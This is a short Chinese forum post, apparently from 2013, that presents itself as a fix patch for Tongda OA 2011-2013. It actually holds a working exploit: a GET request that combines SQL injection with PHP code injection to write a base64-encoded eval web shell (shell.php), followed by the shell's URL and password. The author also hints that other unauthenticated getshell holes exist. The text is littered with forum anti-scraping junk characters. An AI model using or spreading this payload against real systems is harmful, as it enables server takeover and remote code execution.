中国网络渗透测试联盟

标题: 通达OA 2011-2013 通杀GETSHELL修复补丁 [打印本页]

作者: admin    时间: 2013-2-4 16:19
标题: 通达OA 2011-2013 通杀GETSHELL修复补丁
此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.# b  {5 U  s) \6 m
% a3 ^3 y0 J) |2 j+ y8 g* K

6 z6 Z" f0 V. F$ c4 bEXP:
+ `4 C2 F- }/ S; z: a, | ) _7 d- b$ ?8 \3 m( r7 t
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}; y, Y. T& b. `1 p& ^: W0 @

+ l4 I- a  T0 h; B( B0 T0 F0 v第二步: [GET]http://site/general/email/index.php
9 c/ S" ^! i; \4 {. ^9 }
3 [8 z0 A' N% a$ F- R+ s% eSHELL: http://site/general/email/shell.php 密码C6 h" {% r- `* m; I5 F
6 U3 F( m( k, _( b3 [
0 K8 K- ]% v4 \
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell,  这里就不发了, 危害大了不好
8 e7 _. B' t9 z2 L6 U, T 6 A+ i: V/ N- P$ S0 b7 q- ]
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~8 U( t7 h: S: h. k2 j& a3 s+ p

/ q, b. l- K7 ^; q6 X% H
2 |+ u5 M! n7 t" r. x5 t




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2